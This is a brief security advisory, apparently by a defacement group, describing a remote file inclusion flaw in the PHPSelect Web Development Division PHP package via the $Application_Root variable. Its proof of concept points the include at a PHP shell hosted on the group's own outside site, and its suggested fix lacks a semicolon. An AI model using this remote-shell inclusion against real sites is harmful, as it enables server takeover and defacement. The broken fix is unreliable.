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PHPSelect Web Development Division <= Remote File Inclusion

+ PHPSelect Web Development Division :)  <= Remote File Inclusion
+ Affected Software .: PHPSelect Web Development Division
+ Venedor ...........: http://www.phpselect.com/  
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ 
+ Contact ...........: stormhacker[at]hotmail[.]com
+ Code index.php3:
+ .....
+ include("$Application_Root/modules/include/global_settings");
+ .....
+ $Application_Root is not properly sanitized before being used.
+ The bug is in the "PDD" Package for PHPSelect Web Development Division.
+ Solution:
+ Add this line to your php-file:
+ $Application_Root ="user/dir" //Your root path
+ PoC:
+ Place a PHPShell on a remote location:
+ http://wdzone.net/sh.txt?
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE 
+ || Pro Hacker ||
+-------------------------[ W D T ]----------------------------------